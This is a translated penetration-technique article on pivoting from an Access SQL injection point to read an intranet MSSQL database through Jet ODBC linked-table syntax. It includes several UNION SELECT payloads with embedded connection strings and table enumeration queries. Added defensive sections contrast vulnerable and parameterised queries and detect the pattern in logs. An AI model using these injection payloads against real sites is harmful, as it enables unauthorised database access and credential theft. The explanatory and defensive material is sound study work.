Access injection points read MSSQL database content

Source: Internet
Author: User

Author: Emperor

First of all, this method has been around for a long time; it just sat quietly in my head for so long that I had forgotten it. Thanks to Trace for providing the information.

Attackers often encounter arbitrary file download vulnerabilities. The usual approach is to download the database connection file and connect to the database remotely. The ideal case is MSSQL or MySQL, especially when the database and the web server are not separated, because many methods then exist to get a shell. But if the database is separated from the web server and sits on an intranet without Internet access, or a firewall or similar control stops us from connecting to it remotely, things get considerably harder; and if we cannot even find an MSSQL injection point, we are usually stuck.

Here we take MSSQL as an example. We found an arbitrary file download vulnerability, pulled web.config directly, and saw that the database was on the intranet. After half a day I still could not find an injection point. I noticed another website that did have an injection point, but unfortunately it used an Access database, and neither its tables nor its admin backend could be guessed. The target site's admin backend, however, was known, so I set out to read the target site's administrator account through this Access injection point. To make it intuitive, here is my local test result:


Simply put, the test table has three fields, ID, XM and XB; ID is numeric and the other two are character type.
Suppose the vulnerable page executes the SQL statement select * from test where id = 1.
The query returns three columns, so our UNION SELECT has to match that number (in a black-box test the column count is found with order by or by trial and error).

SELECT * FROM test where id = 999999 union Select top 1 1, 2, name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;Database=master].ku

In the master database I created a table named ku. In the query above, id = 999999 does not exist, so the UNION's second SELECT provides the row: the spot on the web page where Access data is normally shown now displays our constructed result, with the name field sitting in the column position that is echoed to the page.

The name field of the ku table is now displayed on the web page, but that is obviously not what we want; what we want is the structure and contents of the whole database.
Take master as an example; below is a simulated result. Since I already know master's structure, it is easy to compare it with the output and check for mistakes.
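As an added example that is not part of the original article, here is the pattern the injection relies on next to its fix: the vulnerable page builds its query by concatenating the id parameter into the SQL text, while the hardened version binds the value as a parameter. sqlite3 stands in for the Access/Jet database so the demo runs offline; the table names, rows and the payload are constructed for the demo, and only the three-column layout and the id = 999999 trick come from the article.

```python
"""Added example (not from the original article): concatenated query vs.
parameterised query. sqlite3 is an assumed stand-in for the Access/Jet
database; table and row contents are constructed for the demo."""
import sqlite3


def make_db():
    """Build an in-memory database with a three-column 'test' table like the
    article's, plus a second table 'ku' that the page was never meant to show."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE test (id INTEGER, xm TEXT, xb TEXT)")
    conn.executemany("INSERT INTO test VALUES (?, ?, ?)",
                     [(1, "alice", "f"), (2, "bob", "m")])
    conn.execute("CREATE TABLE ku (name TEXT)")
    conn.execute("INSERT INTO ku VALUES ('secret-row')")
    return conn


def lookup_vulnerable(conn, user_id):
    """String concatenation: whatever the caller sends becomes part of the SQL,
    so a UNION tacked onto a non-existent id replaces the page's own row."""
    sql = "SELECT * FROM test WHERE id = " + user_id
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, user_id):
    """Parameter binding: user_id travels as a value and is never parsed as SQL.
    Casting to int first also rejects the payload before it reaches the database
    (for a character-type id you would bind the string instead of casting)."""
    try:
        id_value = int(user_id)
    except ValueError:
        return []
    return conn.execute("SELECT * FROM test WHERE id = ?", (id_value,)).fetchall()


# Constructed payload in the article's shape: impossible id plus a UNION that
# matches the three columns and pulls a field from another table.
PAYLOAD = "999999 UNION SELECT 1, 2, name FROM ku"

if __name__ == "__main__":
    c = make_db()
    print(lookup_vulnerable(c, PAYLOAD))      # the UNION row leaks 'secret-row'
    print(lookup_parameterised(c, PAYLOAD))   # [] : the payload is not an integer
```

The parameterised version is the actual fix: with bound parameters there is no column-count matching to do and no linked-table syntax to reach, because the database never sees the caller's text as SQL.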


SELECT * FROM test where id = 999999 union Select top 1 1, 2, table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;Database=master].information_schema.tables

This returns the first table name in the master database.

Getting the name of the next table is just as easy:

SELECT * FROM test where id = 999999 union Select top 1 1, 2, table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;Database=master].information_schema.tables where table_name not in (select top 1 table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=***;Database=master].information_schema.tables)


Column names and column contents are obtained by the same method.

If the id column in the database is character type, the query gets a trailing where clause so that the injected text still joins up with the rest of the application's original statement:

SELECT * FROM test where id = 999999 union Select top 1 1, 2, table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=***;Database=master].information_schema.tables where 1 = 1
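From the detection side, as an added example that is not part of the original article: the linked-table syntax [ODBC;...].table is distinctive enough to alert on. The script below scans constructed web-server log lines (Common Log Format; the client addresses, the 192.0.2.10 database host and the news.asp path are placeholders) for that pattern, records whether it is paired with a UNION SELECT, and extracts the Server= and Database= values so an incident responder knows which internal database host the request tried to reach.

```python
"""Added example (not from the original article): detect the Jet/ODBC
linked-table pivot in web-server logs. Log format, hosts and paths are
constructed for the demo."""
import re
from urllib.parse import unquote_plus

# Jet SQL remote-table reference: [ODBC;key=value;...].table
ODBC_REF = re.compile(r"\[\s*odbc\s*;(?P<conn>[^\]]*)\]\s*\.\s*(?P<table>[\w.]+)",
                      re.IGNORECASE)
UNION_SELECT = re.compile(r"\bunion\b\s+(all\s+)?\bselect\b", re.IGNORECASE)
KV = re.compile(r"\s*(?P<k>[\w ]+?)\s*=\s*(?P<v>[^;]*)")

# Constructed sample log: one ordinary request and two carrying the pivot syntax.
SAMPLE_LOG = [
    '10.0.0.7 - - [10/Oct/2020:13:55:01 +0000] "GET /news.asp?id=2 HTTP/1.1" 200 480',
    '10.0.0.5 - - [10/Oct/2020:13:55:36 +0000] "GET /news.asp?id=999999%20union%20select'
    '%20top%201%201,2,name%20from%20[ODBC;Driver=SQL%20Server;UID=dbo;PWD=dba;'
    'Server=192.0.2.10;Database=master].ku HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Oct/2020:13:57:02 +0000] "GET /news.asp?id=999999%20union%20select'
    '%20top%201%201,2,table_name%20from%20[ODBC;Driver=SQL%20Server;UID=dbo;PWD=dba;'
    'Server=192.0.2.10;Database=master].information_schema.tables HTTP/1.1" 200 530',
]


def parse_conn(conn):
    """Split the embedded ODBC connection string into a dict (keys lower-cased)."""
    out = {}
    for part in conn.split(";"):
        m = KV.fullmatch(part)
        if m:
            out[m.group("k").strip().lower()] = m.group("v").strip()
    return out


def inspect_request(raw_query):
    """Return a finding dict for one URL query string, or None if it looks clean."""
    text = unquote_plus(raw_query)          # undo %20 etc. before matching
    m = ODBC_REF.search(text)
    if not m:
        return None
    conn = parse_conn(m.group("conn"))
    return {
        "union": bool(UNION_SELECT.search(text)),
        "target_server": conn.get("server"),
        "target_db": conn.get("database"),
        "remote_table": m.group("table"),
    }


def scan_log(lines):
    """Return one finding per CLF log line whose query string carries the syntax."""
    findings = []
    for line in lines:
        parts = line.split()
        # CLF: ip - - [ts tz] "METHOD /path?qs HTTP/x" status size
        if len(parts) < 7 or "?" not in parts[6]:
            continue
        finding = inspect_request(parts[6].split("?", 1)[1])
        if finding:
            finding["client_ip"] = parts[0]
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

This is a triage aid, not a control: the same payload can be double-encoded or broken up with comments, so treat a hit as a pointer to the vulnerable parameter and the database account in the connection string. The durable fixes are parameterised queries on the injection point and a least-privilege database login instead of the dbo credentials that web.config handed over.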
